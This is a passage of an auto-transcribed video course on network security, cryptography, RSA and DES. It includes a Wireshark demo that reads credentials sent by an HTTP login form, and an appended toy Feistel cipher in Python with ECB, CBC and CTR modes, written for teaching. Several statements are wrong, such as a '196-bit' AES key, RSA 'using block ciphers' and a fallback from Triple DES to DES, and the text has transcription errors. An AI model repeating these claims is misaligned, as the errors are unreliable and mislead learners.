data and the network from unauthorized personnel acquiring control over the confidentiality of the network. This includes external peripherals and routers that might be used for cable connections. The same can be achieved by using devices like biometric systems. Physical security is critical, especially for small businesses that do not have many resources to devote to security personnel and tools, as opposed to large firms. When it comes to technical network security, it focuses mostly on safeguarding data either kept in the network or engaged in network transitions. This kind fulfills two functions: one is defense against unauthorized users, the other is defense against malicious actions. The last category is administrative. This level of network security protects user behavior, like how the permission has been granted and how the authorization process takes place. This also ensures the level of sophistication the network might need to protect it from all the attacks. This level also suggests necessary amendments that have to be made to the infrastructure. I think that's all the basics that we need to cover on network security. In our next topic, we're going to go through two mediums of network security, which are the transport layer and the application layer. So transport layer security is a way to secure information as it is carried over the internet, with users browsing websites, emails, instant messaging, etc. TLS aims to provide a private and secure connection between a web browser and a website server. It does this with a cryptographic handshake between the two systems using public key cryptography: the two parties to the connection exchange a secret token, and once each machine validates this token, it is used for all communications. The connection employs lighter symmetric cryptography to save bandwidth and processing power. Since the application layer is the closest layer to the end user, it provides hackers with the largest threat surface. Poor app layer security can lead
to performance and stability issues, data theft and, in some cases, the network being taken down. Examples of application layer attacks include distributed denial of service attacks, or DDoS attacks, HTTP floods, SQL injections, cross-site scripting, etc. Most organizations have an arsenal of application layer security protections to combat these and more, such as web application firewalls, secure web gateway services, etc. Now that the theory behind network security has been covered in detail, let us go through some of the tools that can be used to enforce these network security policies. The first tool to be covered in this section is a firewall. A firewall is a type of network security device that keeps track of incoming and outgoing network traffic, and it decides which traffic to allow or deny in accordance with a set of security rules. For more than 25 years, firewalls have served as network security's first line of defense. They provide a barrier between trustworthy, internally protected and regulated networks and shady external networks like the internet at some points. The next tool which can be used to bolster network security is a virtual private network, or VPN. For sure, it's an encrypted connection between a device and a network via the internet. The encrypted connection ensures the secure transmission of sensitive data; it makes it impossible for unauthorized parties to eavesdrop on the traffic and enables remote work for the user. The usage of VPN technology is common in both corporate and personal networks. Next, we cover the importance of intrusion prevention systems in network security, or IPS frameworks. An intrusion prevention system is a network security tool that continually scans the network for harmful activity and responds to it when it does occur, by reporting, blocking or discarding it. It can be either hardware or software. It's more sophisticated than an intrusion detection system, or an IDS framework, which can just warn an administrator and merely identify harmful activities,
while in the case of an IPS, it actually takes action against that activity. The next tool in this section, and the final one, is going to be behavioral analytics. Behavioral analytics focuses more on the statistics that are being carried over and stored through months and years of usage; when some kind of similar pattern is noted, the administrator can detect some kind of attack, similar attacks can be stopped, and the security can be further enhanced. Now that we have covered all that we need to know about network security, the necessary tools and different types, etc., let's go to the benefits of network security as a whole. The first is protection against external threats. The objectives for cyber assaults can be as varied as the attackers themselves; although they are typically initiated for financial gain, whether they are industrial spies, hacktivists or cyber criminals, these bad actors all have one thing in common, which is how quick, clever and covert the attacks are getting. A strong cyber security posture that considers routine software updates may assist organizations in identifying and responding to the abuse techniques, tools and the common entry points. The next benefit is protection against internal threats. The human aspect continues to be the cyber security system's weakest link. Insider risk can originate from current or former workers, third-party vendors or even trusted partners, and they can be unintentional, careless or downright malicious. Aside from that, the rapid expansion of remote work and the personal devices used for business purposes, and even IoT devices in remote locations, can make it easier for these kinds of threats to go undetected until it's too late. However, by proactively monitoring networks and managing access, these risks may be identified and dealt with before they become expensive disasters. The third benefit is increased productivity. It's nearly impossible for employees to function when networks and personal devices are slowed to a crawl by viruses and other cyber
attacks. During the operation of a website, and for the company to run, you must significantly minimize violations and the amount of downtime required to fix a breach by implementing various cyber security measures such as enhanced firewalls, virus scanning and automatic backups. Employee identification of possible email phishing schemes, suspicious links and other malicious criminal activities can also be aided by education and training. Another benefit is brand trust and reputation. Customer retention is one of the most crucial elements in business development. Customers today place a premium on maintaining brand loyalty through a strong cyber security stance; this is the fastest way to get other businesses back, get referrals and sell more tickets overall. Additionally, it helps manufacturers get on the vendor list with bigger companies as a part of the supply chain, which is only as strong as its weakest link. This opens possibilities for potential future endeavors and development. With the rise in censorship and general fear over privacy loss, consumer security is at an all-time high risk. Technology has made our life so much easier while putting up a decent target on our personal information. It is necessary to understand how to simultaneously safeguard our data and be up to date with the latest technological developments. Maintaining this balance has become easier with cryptography taking its place in today's digital world. So hey everyone, this is Baba from Simplilearn, and welcome to this video on cryptography. But before we begin, if you love watching tech videos, subscribe to our channel and hit the bell icon to never miss an update from Simplilearn. So here's a story to help you understand cryptography. Meet Anne. Anne wanted to look for a decent discount on the latest iPhone. She started searching on the internet and found a rather shady website that offered a 50% discount on the first purchase. Once Anne submitted her payment details, a huge chunk of money was withdrawn from her
bank account just moments after. Devastated, Anne quickly realized she had failed to notice that the website was an HTTP webpage instead of an HTTPS one. The payment information submitted was not encrypted, and it was visible to anyone keeping an eye, including the website owner and hackers. Had she used a reputed website which has encrypted transactions and employs cryptography, our iPhone enthusiast could have avoided this particular incident. This is why it's never recommended to visit unknown websites or share any personal information on them.

Now that we understand why cryptography is so important, let's take a look at the topics to be covered today. We take a look into what cryptography is and how it works. We learn where cryptography is being used in our daily lives and how we are benefiting from it. Then we will understand the different types of cryptography and their respective uses. Moving on, we will look at the usage of cryptography in ancient history and a live demonstration of cryptography and encryption in action.

Let's now understand what cryptography is. Cryptography is the science of encrypting or decrypting information to prevent unauthorized access. We transform our data and personal information so that only the correct recipient can understand the message. As an essential aspect of modern data security, using cryptography allows the secure storage and transmission of data between willing parties. Encryption is a primary route for employing cryptography, by adding certain algorithms to jumble up the data. Decryption is the process of reversing the work done by encrypting information so that the data becomes readable again. Both of these methods form the basis of cryptography. For example, when "Simplilearn" is jumbled up or changed in any format, not many people can guess the original word by looking at the encrypted text. The only ones who can are the people who know how to decrypt the coded word, thereby reversing the process of encryption. Any data pre-encryption is
called plain text or clear text. To encrypt the message we use certain algorithms that serve a single purpose of scrambling the data to make it unreadable without the necessary tools. These algorithms are called ciphers. They are a set of detailed steps to be carried out one after the other to make sure the data becomes as unreadable as possible until it reaches the receiver. We take the plain text, pass it to the cipher algorithm and get the encrypted data. This encrypted text is called the ciphertext, and this is the message that is transferred between the two parties. The key that is being used to scramble the data is known as the encryption key. These steps, that is the cipher and the encryption key, are made known to the receiver, who can then reverse the encryption on receiving the message. Unless any third party manages to find out both the algorithm and the secret key that is being used, they cannot decrypt the messages, since both of them are necessary to unlock the hidden content.

Wonder what else we would lose if not for cryptography? Any website where you have an account can read your passwords. Important emails can be intercepted and their contents can be read without encryption during the transit. More than 65 billion messages are sent on WhatsApp every day, all of which are secured thanks to end-to-end encryption. There is a huge market opening up for cryptocurrency, which is possible due to blockchain technology that uses encryption algorithms and hashing functions to ensure that the data is secure. If this is of particular interest to you, you can watch our video on blockchain, the link of which will be in the description.

Of course, there is no single solution to a problem as diverse as explained. There are three variants of how cryptography works and is in practice: symmetric encryption, asymmetric encryption and hashing. Let's find out how much you have understood until now. Do you remember the difference between a cipher and ciphertext? Leave your answers in the
comments, and before we proceed, if you find this video interesting, make sure to give it a thumbs up. Before moving ahead, let's look at symmetric encryption first.

Symmetric encryption uses a single key for both the encryption and decryption of data. It is comparatively less secure than asymmetric encryption but much faster. It is a compromise that has to be embraced in order to deliver data as fast as possible without leaving information completely vulnerable. This type of encryption is used when data rests on servers and identifies personnel for payment applications and services. The potential drawback with symmetric encryption is that both the sender and receiver need to have the same secret key, and it should be kept hidden at all times. The Caesar cipher and the Enigma machine are both symmetric encryption examples that we will look into further. For example, if Alice wants to send a message to Bob, she can apply a substitution cipher or a shift cipher to encrypt the message, but Bob must be aware of the same key itself so he can decrypt it when he finds it necessary to read the entire message.

Symmetric encryption uses one of the two types of ciphers: stream ciphers and block ciphers. Block ciphers break the plain text into blocks of fixed size and use the key to convert it into ciphertext. Stream ciphers convert the plain text into ciphertext one bit at a time instead of resorting to breaking them up into bigger chunks. In today's world, the most widely used symmetric encryption algorithm is AES-256, which stands for Advanced Encryption Standard, which has a key size of 256 bits, with 128-bit and 196-bit key sizes also being available. Other primitive algorithms like the Data Encryption Standard, that is DES, the Triple Data Encryption Standard, 3DES, and Blowfish have all fallen out of favor due to the rise of AES. AES chops up the data into blocks and performs 10-plus rounds of obscuring and substituting the message to make it unreadable.

Asymmetric encryption, on the other hand, has a double
whammy at its disposal. There are two different keys at play here: a public key and a private key. The public key is used to encrypt information pre-transit and a private key is used to decrypt the information post-transit. If Alice wants to communicate with Bob using asymmetric encryption, she encrypts the message using Bob's public key. After receiving the message, Bob uses his own private key to decrypt the data. This way, nobody can intercept the message in between transmissions, and there is no need for any secure key exchange for this to work, since the encryption is done with the public key and the decryption is done with the private key that no one except Bob has access to. Both the keys are necessary to read the full message. There is also a reverse scenario where we can use the private key for encryption and the public key for decryption. A server can sign non-confidential information using its private key, and anyone who has its public key can decrypt the message. This mechanism also proves that the sender is authenticated and there is no problem with the origin of the information.

RSA encryption is the most widely used asymmetric encryption standard. It is named after its founders Rivest, Shamir and Adleman, and it uses block ciphers that separate the data into blocks and obscure the information. Widely considered the most secure form of encryption, albeit relatively slower than AES, it is widely used in web browsing, secure identification, VPNs, emails and chat applications.

With so much hanging on the key secrecy, there must be a way to transmit the keys without others reading our private data. Many systems use a combination of symmetric encryption and asymmetric encryption to bolster security and match speed at the same time. Since asymmetric encryption takes longer to decrypt large amounts of data, the full information is encrypted using a single key, that is symmetric encryption. That single key is then transmitted to the receiver using asymmetric encryption, so you don't have to
compromise either way. Another route is using the Diffie-Hellman key exchange, which relies on a one-way function and is much tougher to break into.

The third variant of cryptography is termed hashing. Hashing is the process of scrambling a piece of data beyond recognition. It gives an output of fixed size, which is known as the hash value of the original data, or just hash in general. The calculations that do the job of messing up the data collection form the hash function. They are generally not reversible without resilient brute force mechanisms, and are very helpful when storing data on website servers that need not be stored in plain text. For example, many websites store your account passwords in a hashed format so that not even the administrator can read your credentials. When a user tries to log in, they can compare the entered password's hash value with the hash value that is already stored on the servers for authentication, since the function will always return the same value for the same input.

Cryptography has been in practice for centuries. Julius Caesar used a substitution shift to move alphabets a certain number of spaces beyond their place in the alphabet table, so a spy can't decipher the original message at first glance. For example, if he wanted to pass confidential information to his armies and decides to use the substitution shift of plus 2, a becomes c, b becomes d, and so on. The word "attack", when passed through a substitution shift of plus 3, becomes "dwwdfn". This cipher has been appropriately named the Caesar cipher, which is one of the most widely used algorithms.

The Enigma is probably the most famous cryptographic cipher device used in ancient history. It was used by the Nazi German armies during the world wars. They were used to protect confidential political, military and administrative information, and it consisted of three or more rotors that scrambled the original message depending on the machine's state at that time. The decryption is similar, but it needs both
machines to stay in the same state before passing the ciphertext so that we receive the same plain text message.

Let's take a look at how our data is protected while we browse the internet, thanks to cryptography. Here we have a web-based tool that will help us understand the process of RSA encryption. We see the entire workflow, from selecting the key size to be used until the decryption of the ciphertext in order to get the plain text back. As we already know, the RSA encryption algorithm falls under the umbrella of asymmetric key cryptography. That basically implies that we have two keys at play here: a public key and a private key. Typically the public key is used by the sender to encrypt the message and the private key is used by the receiver to decrypt the message. There are some occasions when this allocation is reversed, and we will have a look at them as well. In RSA we have the choice of key size: we can select any key from 512-bit to 1024-bit all the way up to a 4096-bit key. The longer the key length, the more complex the encryption process becomes, thereby strengthening the ciphertext, although with added security, more complex functions take longer to perform the same operations on a similar size of data. We have to keep a balance between both speed and strength, because the strongest encryption algorithms are of no use if they cannot be practically deployed in systems around the world. Let's take a 1024-bit key over here. Now we need to generate the keys. This generation is done by functions that operate on passphrases. The tool we are using right now generates these pseudorandom keys to be used in this explanation. Once we generate the keys, you can see the public key is rather smaller than the private key, which is almost always the case. These two keys are mathematically linked with each other. They cannot be substituted with any other key, and in order to encrypt the original message or decrypt the ciphertext this pair must be kept together. The public key is then sent to
the sender, and the receiver keeps the private key with himself in this scenario. Let's try and encrypt the word "Simplilearn". We have to select if the key being used for encryption is either private or public, since that affects the process of scrambling the information. Since we are using the public key over here, let's select the same, and copy it and paste it over here. Okay, the cipher we are using right now is plain RSA. There are some modified ciphers with their own pros and cons that can also be used, provided we use them on a regular basis and depending on the use case as well. Once you click on encrypt, we can see the ciphertext being generated over here. The pseudorandom generating functions are created in such a way that a single character change in the plain text will trigger a completely different ciphertext. This is a security feature to strengthen the process against brute force methods.

Now that we are done with the encryption process, let's take a look at the decryption part. The receiver gets this ciphertext from the sender with no other key or supplement; he or she must already possess the private key generated from the same pair. No other private key can be used to decrypt the message, since they are mathematically linked. We paste the private key here and select the same. The cipher must always be the same as the one used during the encryption process. Once you click decrypt, you can see the original plain text we had decided to encrypt. This sums up the entire process of RSA encryption and decryption.

Now, some people use it the other way around. We also have the option of using the private key to encrypt information and the public key to decrypt it. This is done mostly to validate the origin of the message. Since the keys only work in pairs, if a different private key is used to encrypt the message, the public key cannot decrypt it. Conversely, if the public key is able to decrypt the message, it must have been encrypted with the right private key, and hence the rightful owner. Here we just have
to take the private key and use that to encrypt the plain text, and select the same in this checkbox as well. You can see we have generated a completely new ciphertext. This ciphertext will be sent to the receiver, and this time we will use the public key for decryption. Let's select the correct checkbox and decrypt, and we still get the same output.

Now let's take a look at a practical example of encryption in the real world. We all use the internet on a daily basis, and many are aware of the implications of using unsafe websites. Let's take a look at Wikipedia here, a pretty standard HTTPS website, where the S stands for secure. Let's take a look at how it secures the data. Wireshark is the world's foremost and most widely used network protocol analyzer. It lets you see what's happening on your network at a microscopic level, and we are going to use the software to see the traffic that is leaving our machine and to understand how vulnerable it is. Since there are many applications running on this machine, let's apply a filter that will only show us the results related to Wikipedia. Let's search for something that we can navigate the website with. Okay, once we get into it a little, you can see some of the requests being populated over here. Let's take a look at a specific request. These are the data packets that basically transport the data from our machine to the internet and vice versa. As you can see, there's a bunch of gibberish data here that doesn't really reveal anything that we searched or watched. Similarly, other secured websites function the same way, and it is very difficult, if at all possible, to snoop on user data this way.

To put this in perspective, let's take a look at another website which is an HTTP web page, with no HTTPS enabled from the server end, which makes it vulnerable to attacks. There is a login form here which needs legitimate user credentials in order to grant access. Let's enter a random pair of credentials. These obviously won't work, but we can see the manner of
data transfer. Unsurprisingly, we weren't able to get into the platform; instead we can see the data packets. Let's apply a similar filter that will help us understand what requests this website is sending. These are the requests being sent by the HTTP login form to the internet. If we check here, we can easily see whatever username and password we are entering with Wireshark. Now, we used a dummy pair of credentials; if we select the right data packet, we can find our current credentials. If any website had asked for payment information or legitimate credentials, it would have been really easy to get a hold of these. To reiterate what we have already learned, we must always avoid HTTP websites, and just unknown or not trustworthy websites in general, because the problem we saw here is just the tip of the iceberg. Even though cryptography has managed to lessen the risk of cyber attacks, it is still prevalent, and we should always be alert to keep ourselves safe online.

There are two types of encryption in cryptography: symmetric key cryptography and asymmetric key cryptography. Both of these categories have their pros and cons and differ only by the implementation. Today we are going to focus exclusively on symmetric key cryptography. Let us have a look at its applications in order to understand its importance better. This variant of cryptography is primarily used in banking applications, where personally identifiable information needs to be encrypted. With so many aspects of banking moving on to the internet, having a reliable safety net is crucial. Symmetric cryptography helps in detecting bank fraud and boosts the security index of these payment gateways in general. They are also helpful in protecting data that is not in transit and rests on servers and data centers. These centers house a massive amount of data that needs to be encrypted with a fast and efficient algorithm, so that when the data needs to be recalled by the respective service there is the assurance of minor to no
delay. While browsing the internet, we need symmetric encryption to browse secure HTTPS websites so that we get all-around protection. It plays a significant role in verifying website server authenticity, exchanging the necessary encryption keys required and generating a session using those keys to ensure maximum security. This helps us in preventing the rather insecure HTTP website format.

So let us understand how symmetric key cryptography works first, before moving on to the specific algorithms. Symmetric key cryptography relies on a single key for the encryption and decryption of information. Both the sender and receiver of the message need to have a pre-shared secret key that they will use to convert the plain text into ciphertext and vice versa. As you can see in the image, the key used for encryption is the same key needed for decrypting the message at the other end. The secret key shouldn't be sent along with the ciphertext to the receiver, because that would defeat the entire purpose of using cryptography. Key exchange can be done beforehand using other algorithms like the Diffie-Hellman key exchange protocol, for example. For example, if Paul wants to send a simple message to Jane, they need to have a single encryption key that both of them must keep secret to prevent snooping by malicious actors. It can be generated by either one of them but must belong to both of them before the messages start flowing. Suppose the message "I am ready" is converted into ciphertext using a specific substitution cipher by Paul. In that case, Jane must also be aware of the substitution shift to decode the ciphertext once it reaches her. Irrespective of the scenario where someone manages to grab the ciphertext mid-transit to try and read the message, not having the secret key renders everyone looking to snoop in helpless. Symmetric key algorithms like the Data Encryption Standard have been in use since the 1970s, while the popular ones like AES have become the industry standard today. With
the entire architecture of symmetric cryptography depending on the single key being used, you can understand why it's of paramount importance to keep it secret on all locations. The side effect of having a single key for the encryption and decryption is that it becomes a single point of failure. Anyone who gets their hands on it can read all the encrypted messages, and do so mainly without the knowledge of the sender and the receiver. So it is the priority to keep the encryption and decryption key private at all times. Should it fall into the wrong hands, the third party can send messages to either the sender or the receiver using the same key to encrypt the message. Upon receiving the message and decrypting it with the key, it is impossible to guess its origin. If the sender somehow transmits the secret key along with the ciphertext, anyone can intercept the package and access the information. Consequently, this encryption category is termed private key cryptography, since a big part of the data's integrity is riding on the promise that the users can keep the key secret. This terminology contrasts with asymmetric key cryptography, which is called public key cryptography because it has two different keys at play, one of which is public.

Provided we manage to keep the keys secret, we still have to choose what kind of ciphers we want to use to encrypt this information. In symmetric key cryptography there are broadly two categories of ciphers that we can employ. Let us have a look. Stream ciphers are the algorithms that encrypt basic information one bit at a time. It can change depending on the algorithm being used, but usually it relies on a single bit or byte to do the encryption. This is the relatively quicker alternative, considering the algorithm doesn't have to deal with blocks of data at a single time. Every piece of data that goes into the encryption can and needs to be converted into binary format. In stream ciphers each binary digit is encrypted one after the other. The most popular ones are
RC4, Salsa and Panama. The binary data is passed through an encryption key, which is a randomly generated bitstream. Upon passing it through, we receive the ciphertext that can be transferred to the receiver without fear of man-in-the-middle attacks. The binary data can be passed through an algorithmic function; it can have either XOR operations, as it does most of the time, or any other mathematical calculations that have the singular purpose of scrambling the data. The encryption key is generated using the random bitstream generator and acts as a supplement in the algorithmic function. The output is in binary form, which is then converted into the decimal or hexadecimal format to give our final ciphertext.

On the other hand, block ciphers dissect the raw information into chunks of data of fixed size. The size of these blocks depends on the exact cipher being used. A 128-bit block cipher will break the plain text into blocks of 128 bits each and encrypt those blocks instead of a single digit. Once these blocks are encrypted individually, they are chained together to form a final ciphertext. Block ciphers are much slower, but they are more tamper-proof and are used in some of the most widely used algorithms employed today. Just like stream ciphers, the original plain text is converted into binary format before beginning the process. Once the conversion is complete, the blocks are passed to the encryption algorithm along with the encryption key. This would provide us with the encrypted blocks of binary data. Once these blocks are combined, we get a final binary string. This string is then converted into hexadecimal format to get a ciphertext. Today the most popular symmetric key algorithms like AES, DES and 3DES are all block cipher methodology subsets.

With so many factors coming into play, there are quite a few things symmetric key cryptography excels at while falling short in some others. Symmetric key cryptography is a much faster variant when compared to asymmetric cryptography. There is only
one key in play, unlike asymmetric encryption, and this drastically improves calculation speed in the encryption and decryption. Similarly, the performance of symmetric encryption is much more efficient under similar computational limitations. Fewer calculations help in better memory management for the whole system. Bulk amounts of data that need to be encrypted are very well suited for symmetric algorithms, since they are much quicker. Handling large amounts of data is simple and easy to use in servers and data farms. This helps in better latency during data recall and fewer mixed packets. Thanks to its simple single key structure, symmetric key cryptography algorithms are much easier to set up a communication channel with, and offer much more straightforward maintenance duties. Once the secret key is transmitted to both the sender and receiver without any prior mishandling, the rest of the system aligns easily, and everyday communications become easy and secure. If the algorithm is applied as per the documentation, symmetric algorithms are very robust and can encrypt vast amounts of data with very little overhead.

The DES algorithm stands for Data Encryption Standard. It is a symmetric key cipher that is used to encrypt and decrypt information in a block-by-block manner. Each block is encrypted individually, and they are later chained together to form our final ciphertext, which is then sent to a receiver. DES takes the original, unaltered piece of data, called the plain text, in a 64-bit block, and it is converted into an encrypted text that is called the ciphertext. It uses 48-bit keys during the encryption process and follows a specific structure called the Feistel cipher structure during the entire process. It is a symmetric key algorithm, which means DES can reuse the keys used in the encryption format to decrypt the ciphertext back to the original plain text. Once the 64-bit blocks are encrypted, they can be combined together before being transmitted. Let's take a look at the origin and the
reason DES was founded. DES is based on a Feistel block cipher called Lucifer, developed in 1971 by IBM cryptography researcher Horst Feistel. DES uses 16 rounds of the Feistel structure, using a different key for each round. It also utilizes a random function with two inputs and provides a single output variable. DES became the organization's approved encryption standard in November 1976 and was later reaffirmed as a standard in 1983, 1988 and finally in 1999. But eventually DES was cracked, and it was no longer considered a secure solution for all official routes of communication. Consequently, Triple DES was developed. Triple DES is a symmetric key block cipher that applies the DES cipher three times: encrypt with the first key, decrypt with the second key, and encrypt again with a third key. There is also a variation with two keys, where the first and second key are duplicates of each other. But Triple DES was ultimately deemed too slow for the growing need for fast communication channels, and people eventually fell back to using DES for encrypting messages. In order to search for a better alternative, a public-wide competition was organized to help cryptographers develop their own algorithm as a proposal for the next global standard. This is where the Rijndael algorithm came into play and was later credited to be the next Advanced Encryption Standard. For a long time DES was the standard for data encryption and data security. Its reign ended in 2002, when finally the Advanced Encryption Standard replaced DES as an acceptable standard following a public competition.

To understand the structure of a Feistel cipher, we can use the following image as a reference. The block being encrypted is divided into two parts, one of which is being passed on to the function while the other part is XORed with the function's output. The function also uses the encryption key, which differs for each individual round. This keeps going on until the last step, where the right-hand side and the left-hand
side are being swapped. Here we receive our final ciphertext. For the decryption process, the entire procedure is reversed, starting from the order of the keys to the block sorting. If the entire process is repeated in reverse order, we will eventually get back our plain text, and this simplicity helps the speed overall. This was later detrimental to the efficiency of the algorithm, hence the security was compromised.

A Feistel block cipher is a structure used to derive many symmetric block ciphers such as DES, which we have discussed previously. The Feistel cipher proposed a structure that implements substitution and permutation alternately so that we can obtain ciphertext from the plain text and vice versa. This helps in reducing the redundancy of the program and increases the complexity to combat brute force attacks. The Feistel cipher is actually based on the Shannon structure that was proposed in 1945. The Feistel cipher is the structure suggested by Horst Feistel, which was considered to be a backbone while developing many symmetric block ciphers. The Shannon structure highlights the implementation of alternate confusion and diffusion, and like we already discussed, the Feistel cipher structure can be completely reversed depending on the data. However, we must consider the fact that to decrypt the information by reversing the Feistel structure we will need the exact polynomial functions and the key orders.

To understand how the blocks are being calculated, we take a plain text which is of 64 bits, and that is later divided into two equal halves of 32 bits each. In this, the right half is immediately transferred to the next round to become the new left half of the second round. The right half is again passed off to a function which uses an encryption key that is unique to each round in the Feistel cipher. Whatever the function gives off as an output, it is passed on as an XOR input with the left half of the initial plain text. The next output will become the right half of the second
round for the plain text. This entire process constitutes a single round in the Feistel cipher. Taking into account what happens in a polynomial function, we take one half of the block and pass it through an expansion box. The work of the expansion box is to increase the size of the half from 32-bit to 48-bit text. This is done to make the text compatible with the 48-bit keys we have generated beforehand. Once we pass it through the XOR function, we get a 48-bit text as an output. Now remember, a half should be of 32 bits, so this 48-bit output is then later passed on to a substitution box. This substitution box reduces its size from 48-bit to a 32-bit output, which is then later XORed with the first half of the plain text.

A block cipher is considered the safest if the size of the block is large, but large block sizes can also slow down the encryption speed and the decryption speed. Generally the size is 64-bit; sometimes modern block ciphers like AES have a 128-bit block size as well. The security of the block cipher increases with increasing key size, but larger key sizes may also reduce the speed of the process. Earlier, 64-bit keys were considered sufficient; modern ciphers need to use 128-bit keys due to the increasing complexity of today's computational standards. The increasing number of rounds also increases the security of the block cipher; similarly, they are inversely proportional to the speed of encryption. A highly complex round function enhances the security of the block cipher. Always, we must maintain a balance between speed and security. The symmetric block cipher is implemented in a software application to achieve better execution speed. There is no use of an algorithm if it cannot be implemented in a real-life framework that can help organizations to encrypt or decrypt the data in a timely manner.

Now that we understand the basics of Feistel ciphers, we can take a look at how DES manages to run through 16 rounds of this structure and provide the ciphertext at the end. In simple terms, DES takes the 64-bit plain text and converts it into a 64-bit ciphertext, and since we are talking about a symmetric algorithm, the same key is being used when it is decrypting the data as well. We first take a 64-bit plain text and we pass it through an initial permutation function. The initial permutation function has the job of dividing the block into two different parts so that we can perform Feistel cipher structures on it. There are multiple rounds being performed in the DES algorithm, namely 16 rounds of the Feistel cipher structure. Each of these rounds will need keys. Initially we take a 56-bit cipher key, but it is a single key; we pass it on to our round key generator, which generates 16 different keys, one for each single round that the Feistel cipher is being run. These keys are passed on to the rounds as 48 bits. The size of these 48-bit keys is the reason we use the substitution and permutation boxes in the polynomial functions of the Feistel ciphers. When passing through all these rounds, we reach round 16, where the final key is passed on from the round key generator, and we get a final permutation. In the final permutation, the halves are swapped and we get a final ciphertext. This is the entire process of DES, with 16 rounds of Feistel ciphers encompassed in it. To decrypt a ciphertext back to the plain text, we just have to reverse the process we did in the DES algorithm and reverse the key order along with the functions. This kind of simplicity is what gave DES the bonus when it comes to speed, but eventually it was detrimental to the overall efficiency of the program when it comes to security factors.

DES has five different modes of operation to choose from. One of those is electronic codebook: each 64-bit block is encrypted and decrypted independently in the electronic codebook format. We also have cipher
blockchaining or the CBC method here each 64-bit block depends on the previous one and all of them use an initialization vector we have a cipher feedback block mechanism where the preceding ciphertext becomes the input for the encryption algorithm it produces a pseudo random output which in turn is xored with the plain text there is an output feedback method as well which is the same as Cipher feedback except that the encryption algorithm input is the output from the preceding Des counter method has a different way of approach where each plain text block is xored with an encrypted counter the counter is then incremented for each subsequent block there are a few other alternatives to these modes of operation but the five mentioned above are the most widely used in the industry and recommended by cryptographers worldwide let's take a look at the future of Tes the dominance of Des ended in 2002 when the advanced encryption standard replaced the DS encryption algorithm as the accepted standard it was done by following a public competition to find a replacement nist officially withdrew the global acceptance standard in May 2005 although triple Des is approved for some sensitive government information through 2030. 
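The Feistel round structure and the ECB, CBC and CTR modes described above, as an added example that is not part of the original transcript or video: a toy 64-bit Feistel cipher whose round function and key schedule are SHA-256 based stand-ins (not the real DES tables), decrypted by running the same rounds with the subkeys reversed, with the three modes built on top of it. Running it shows ECB leaking repeated plaintext blocks and a single flipped ciphertext bit in CBC corrupting exactly two plaintext blocks. The key, IV and plaintext are constructed for the demo.

```python
# Added example (not from the original transcript): a toy Feistel block cipher
# and the ECB/CBC/CTR modes built on top of it. The round function and key
# schedule are SHA-256 based stand-ins, NOT the real DES tables. Study only.
import hashlib

BLOCK = 8          # 64-bit block, like DES
HALF = BLOCK // 2
ROUNDS = 16


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def round_keys(key: bytes) -> list:
    """Stand-in key schedule: one 32-bit subkey per round derived from the key.
    (DES instead derives 48-bit subkeys from its 56 effective key bits.)"""
    return [hashlib.sha256(key + bytes([i])).digest()[:HALF] for i in range(ROUNDS)]


def f(right: bytes, subkey: bytes) -> bytes:
    """Round function F(R, K). It is not invertible and does not need to be:
    the Feistel structure only ever XORs its output into the other half."""
    return hashlib.sha256(right + subkey).digest()[:HALF]


def feistel(block: bytes, subkeys: list) -> bytes:
    """Split the block into halves, run the rounds, swap the halves at the end."""
    left, right = block[:HALF], block[HALF:]
    for k in subkeys:
        left, right = right, xor(left, f(right, k))
    return right + left


def encrypt_block(key: bytes, block: bytes) -> bytes:
    return feistel(block, round_keys(key))


def decrypt_block(key: bytes, block: bytes) -> bytes:
    # Decryption is the same network with the subkeys in reverse order.
    return feistel(block, round_keys(key)[::-1])


def blocks(data: bytes) -> list:
    assert len(data) % BLOCK == 0, "demo expects whole blocks (no padding)"
    return [data[i:i + BLOCK] for i in range(0, len(data), BLOCK)]


def ecb_encrypt(key: bytes, data: bytes) -> bytes:
    return b"".join(encrypt_block(key, b) for b in blocks(data))


def cbc_encrypt(key: bytes, iv: bytes, data: bytes) -> bytes:
    out, prev = [], iv
    for b in blocks(data):
        prev = encrypt_block(key, xor(b, prev))   # chain: XOR with previous ciphertext
        out.append(prev)
    return b"".join(out)


def cbc_decrypt(key: bytes, iv: bytes, data: bytes) -> bytes:
    out, prev = [], iv
    for c in blocks(data):
        out.append(xor(decrypt_block(key, c), prev))
        prev = c
    return b"".join(out)


def ctr_crypt(key: bytes, nonce: bytes, data: bytes) -> bytes:
    """CTR: XOR each block with E(nonce || counter); one function encrypts and decrypts."""
    out = []
    for i, b in enumerate(blocks(data)):
        keystream = encrypt_block(key, nonce + i.to_bytes(BLOCK - len(nonce), "big"))
        out.append(xor(b, keystream))
    return b"".join(out)


def cbc_blocks_corrupted_by_bit_flip(key: bytes, iv: bytes, plaintext: bytes,
                                     block_index: int = 1) -> list:
    """Flip one bit of one CBC ciphertext block and report which plaintext blocks
    decrypt differently. Expect exactly [block_index, block_index + 1]."""
    ct = bytearray(cbc_encrypt(key, iv, plaintext))
    ct[block_index * BLOCK] ^= 0x01
    recovered = cbc_decrypt(key, iv, bytes(ct))
    return [i for i, (p, r) in enumerate(zip(blocks(plaintext), blocks(recovered))) if p != r]


if __name__ == "__main__":
    key = b"demo-key"                     # constructed demo key
    iv = b"\x00" * BLOCK                  # constructed IV; use a random one in practice
    pt = b"SAMEBLOC" * 4                  # four identical plaintext blocks
    ecb = ecb_encrypt(key, pt)
    print("ECB repeats:", ecb[:BLOCK] == ecb[BLOCK:2 * BLOCK])   # pattern leak
    cbc = cbc_encrypt(key, iv, pt)
    print("CBC repeats:", cbc[:BLOCK] == cbc[BLOCK:2 * BLOCK])
    print("CBC blocks hit by one flipped bit:", cbc_blocks_corrupted_by_bit_flip(key, iv, pt))
```

The CBC result is the point worth remembering: a flipped ciphertext bit garbles the block it sits in and flips the same bit in the next plaintext block, and nothing after that, which is exactly why CBC without a MAC is malleable.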
NIST also had to retire the DES algorithm because its key length was too short given the increased processing power of newer computers. The strength of a cipher against brute force is tied to the size of its key, and DES found itself a victim of ongoing advances in computing: we reached a point where a 56-bit key was no longer a challenge for an attacker's machines, and the whole keyspace could be searched exhaustively. Note that DES no longer being the NIST federal standard does not mean it is no longer in use; triple DES is still found in deployed systems today, although it is considered a legacy algorithm.

